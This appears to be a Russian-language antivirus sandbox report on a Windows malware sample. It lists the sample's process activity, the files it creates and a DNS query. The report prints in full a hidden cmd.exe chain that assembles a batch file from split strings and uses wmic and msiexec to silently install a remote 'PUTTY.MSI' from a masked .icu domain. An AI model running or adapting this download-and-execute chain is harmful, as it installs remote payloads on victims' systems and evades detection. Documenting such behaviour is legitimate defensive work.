Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c echo|set /p="wmic process call create 'ms">%temp%\XlIAx.bat&echo|set /p="iexec /i http://li#####buniversity.icu/PUTTY.MSI /q'" >> %temp%\XlIAx.bat&%temp%\XlIAx.bat>%temp%\XlIAx.txt
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\xliax.bat
- %TEMP%\xliax.txt
Сетевая активность
UDP
- DNS ASK li#####buniversity.icu
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c echo|set /p="wmic process call create 'ms">%temp%\XlIAx.bat&echo|set /p="iexec /i http://li#####buniversity.icu/PUTTY.MSI /q'" >> %temp%\XlIAx.bat&%temp%\XlIAx.bat>%temp%\XlIAx.txt' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /S /D /c" echo"
- '<SYSTEM32>\cmd.exe' /S /D /c" set /p="wmic process call create 'ms" 1>%TEMP%\XlIAx.bat"
- '<SYSTEM32>\cmd.exe' /S /D /c" set /p="iexec /i http://li#####buniversity.icu/PUTTY.MSI /q'" 1>>%TEMP%\XlIAx.bat"
- '<SYSTEM32>\wbem\wmic.exe' process call create 'msiexec /i http://li#####buniversity.icu/PUTTY.MSI /q'
- '<SYSTEM32>\msiexec.exe' /i http://li#####buniversity.icu/PUTTY.MSI /q
